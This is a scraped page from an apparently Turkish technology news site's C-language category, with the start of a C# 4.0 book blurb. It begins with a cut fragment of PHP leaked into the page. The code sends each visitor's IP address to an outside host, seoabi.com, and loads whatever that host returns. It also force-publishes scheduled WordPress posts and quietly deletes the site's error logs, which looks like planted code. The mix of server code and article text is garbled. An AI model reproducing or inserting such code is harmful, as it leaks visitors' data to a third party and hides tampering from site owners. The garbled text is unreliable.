$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> C Dili | Teknoloji Haberleri

C Dili kategorisindeki tüm yazılar

Son Yazılar

C# 4.0’ı her yönüyle öğrenin

Bu kitap, nesne yönelimli programlama dili C#’ı öğrenmek için temel kılavuzunuz olabilir! Kendi alanında bir “kült” haline gelen kaynak kitabın, gözden geçirilmiş, düzeltilmiş, güncellenmiş ve dizinle zenginleştirilmiş 16. baskısı… .NET platformu için sıfırdan geliştirilen bir dil olan C#, kendinden önce gelen gözde programlama dilleri C, C++ ve